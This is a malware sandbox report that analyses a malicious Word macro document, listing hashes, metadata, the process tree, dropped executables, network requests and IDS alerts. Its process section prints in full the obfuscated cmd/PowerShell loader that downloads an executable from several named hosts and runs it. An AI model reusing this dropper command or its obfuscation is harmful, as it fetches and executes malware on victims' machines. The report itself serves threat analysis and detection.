analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

DOC-493273.doc

Full analysis: https://app.any.run/tasks/b31b4a6e-8daa-4bbd-873a-329bd87246f0
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: January 17, 2019, 14:51:48
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

D90B52D598D33A560C7A434763E6F8FD

SHA1:

A77522B68658D89A26E31B204ACD7EF54A25F2CF

SHA256:

998704D43CDA53C5970525EA02600769D77F1E3833E6C866E873255576CDE361

SSDEEP:

3072:pxSFi1YPF5afplsMaGJe4NDACVR1iNKDzaJFUKc0UTE7yZRUV7RJeOzi80:pT1Y/affaGJdzRQEDzYUTE7yZRVUi80

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2948)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2948)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3876)
    • Application was dropped or rewritten from another process

      • 84.exe (PID: 3064)
      • wabmetagen.exe (PID: 2624)
      • wabmetagen.exe (PID: 3944)
      • 84.exe (PID: 3516)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2428)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2428)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2428)
      • 84.exe (PID: 3064)
    • Application launched itself

      • 84.exe (PID: 3516)
    • Starts itself from another location

      • 84.exe (PID: 3064)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2948)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2948)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentMacrosPresent: yes
WordDocumentEmbeddedObjPresent: no
WordDocumentOcxPresent: no
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentDocumentPropertiesRevision: 1
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesCreated: 2019:01:17 13:24:00Z
WordDocumentDocumentPropertiesLastSaved: 2019:01:17 13:24:00Z
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesWords: 12
WordDocumentDocumentPropertiesCharacters: 70
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesCharactersWithSpaces: 81
WordDocumentDocumentPropertiesVersion: 16
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesStyleType: paragraph
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentDocSuppDataBinData: (Binary data 95772 bytes, use -b option to extract)
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentDocPrViewVal: print
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 005A24B1
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentBodySectPRsidRDefault: 00D22D94
WordDocumentBodySectPRRsidRPr: 001912D2
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictBinData: (Binary data 111550 bytes, use -b option to extract)
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:115.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRT:
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrDocGridLine-pitch: 360
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 84.exe no specs 84.exe wabmetagen.exe no specs wabmetagen.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2948"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOC-493273.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3876"C:\Windows\system32\cmd.exe" /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $HTTP29='Concrete14';$Rubber19=new-object Net.WebClient;$Track45='http://www.klussen-gids.nl/xzMPGNb_wYmswEnQ_ugnZr@http://otkachka.novosibirsk.ru/iyqDsD_mViujo_JLyB@http://www.biometricsystems.ru/DfI5jgz_WjwyzgT@http://www.shengen.ru/sites/default/files/jBkgiodo_Uxnlb4D6_wIX@http://highclass-store.co/NzDOK_DeMJ9_tU'.Split('@');$Metal62='Jewelery49';$Somalia10 = '84';$Gardens64='CordobaOro81';$innovate4=$env:public+'\'+$Somalia10+'.exe';foreach($bypass74 in $Track45){try{$Rubber19.DownloadFile($bypass74, $innovate4);$Hryvnia84='bricksandclicks41';If ((Get-Item $innovate4).length -ge 80000) {Invoke-Item $innovate4;$Steel77='SportsBeauty47';break;}}catch{}}$IncredibleMetalFish2='CotedIvoire78'; C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2428powershell $HTTP29='Concrete14';$Rubber19=new-object Net.WebClient;$Track45='http://www.klussen-gids.nl/xzMPGNb_wYmswEnQ_ugnZr@http://otkachka.novosibirsk.ru/iyqDsD_mViujo_JLyB@http://www.biometricsystems.ru/DfI5jgz_WjwyzgT@http://www.shengen.ru/sites/default/files/jBkgiodo_Uxnlb4D6_wIX@http://highclass-store.co/NzDOK_DeMJ9_tU'.Split('@');$Metal62='Jewelery49';$Somalia10 = '84';$Gardens64='CordobaOro81';$innovate4=$env:public+'\'+$Somalia10+'.exe';foreach($bypass74 in $Track45){try{$Rubber19.DownloadFile($bypass74, $innovate4);$Hryvnia84='bricksandclicks41';If ((Get-Item $innovate4).length -ge 80000) {Invoke-Item $innovate4;$Steel77='SportsBeauty47';break;}}catch{}}$IncredibleMetalFish2='CotedIvoire78'; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3516"C:\Users\Public\84.exe" C:\Users\Public\84.exepowershell.exe
User:
admin
Company:
Microsoft Corpor
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.1.760
3064"C:\Users\Public\84.exe"C:\Users\Public\84.exe
84.exe
User:
admin
Company:
Microsoft Corpor
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.1.760
3944"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe84.exe
User:
admin
Company:
Microsoft Corpor
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.1.760
2624"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exewabmetagen.exe
User:
admin
Company:
Microsoft Corpor
Integrity Level:
MEDIUM
Version:
6.1.760
Total events
1 382
Read events
983
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6BE9.tmp.cvr
MD5:
SHA256:
2948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90A87863.jpg
MD5:
SHA256:
2428powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3Q5UGDGTTFAMZD94VONP.temp
MD5:
SHA256:
2948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$C-493273.docpgc
MD5:4E8D01D1DE6303A9F41B03B4135B3679
SHA256:6855A2039CBF465FE413D6C3A93133078F8A29D9B7B34EEAC0568636EA9D0D5A
2428powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2473f8.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2428powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
306484.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:FD38151C3BB8A28281742E31DE7AC71C
SHA256:E11A346123BF84E55CE564D403BD9DA2FA676CAA2F8CDE871B70EA7089A944B2
2948WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B8F86FF28835EFB3D330069228B92D90
SHA256:1CB8760651B82A65480CC246F78DA1DF926B21DDBE3CBD2765C62A48CB2E5E2F
2428powershell.exeC:\Users\Public\84.exeexecutable
MD5:FD38151C3BB8A28281742E31DE7AC71C
SHA256:E11A346123BF84E55CE564D403BD9DA2FA676CAA2F8CDE871B70EA7089A944B2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2428
powershell.exe
GET
200
185.182.56.226:80
http://www.klussen-gids.nl/xzMPGNb_wYmswEnQ_ugnZr/
NL
executable
158 Kb
suspicious
2428
powershell.exe
GET
301
185.182.56.226:80
http://www.klussen-gids.nl/xzMPGNb_wYmswEnQ_ugnZr
NL
html
258 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2428
powershell.exe
185.182.56.226:80
www.klussen-gids.nl
Astralus B.V.
NL
suspicious

DNS requests

Domain
IP
Reputation
www.klussen-gids.nl
  • 185.182.56.226
suspicious

Threats

PID
Process
Class
Message
2428
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2428
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2428
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info